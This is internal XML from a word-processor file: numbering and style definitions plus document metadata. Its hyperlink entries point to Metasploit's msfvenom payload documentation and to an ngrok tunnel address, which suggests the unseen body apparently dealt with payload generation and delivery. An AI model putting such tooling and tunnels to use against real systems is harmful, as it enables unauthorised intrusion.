        </w:tabs>
        <w:ind w:left="2145" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2505"/>
        </w:tabs>
        <w:ind w:left="2505" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6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  <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3225"/>
        </w:tabs>
        <w:ind w:left="3225" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3585"/>
        </w:tabs>
        <w:ind w:left="3585" w:hanging="36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7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rFonts w:eastAsia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eastAsia="Times New Roman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qFormat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eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="2F5496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qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="2F5496"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading6Char" w:customStyle="1">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman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eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading8Char" w:customStyle="1">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman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eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="272727"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TitleChar" w:customStyle="1">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="Times New Roman" w:cs="Times New Roman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Times New Roman" w:cs="Times New Roman"/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2F5496"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseQuoteChar" w:customStyle="1">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteCharacters">
    <w:name w:val="Footnote Characters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Bengal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Bengal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Bengal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Bengali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rFonts w:eastAsia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16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yperlink" Target="https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html" TargetMode="External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hyperlink" Target="https://b26a127a3292.ngrok-free.app/" TargetMode="External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Application>LibreOffice/25.2.3.2$Linux_X86_64 LibreOffice_project/520$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>22</Pages>
  <Words>1409</Words>
  <Characters>8456</Characters>
  <CharactersWithSpaces>10346</CharactersWithSpaces>
  <Paragraphs>251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2025-07-11T06:38:00Z</dcterms:created>
  <dc:creator>Istiaq Alam</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-06T14:15:20Z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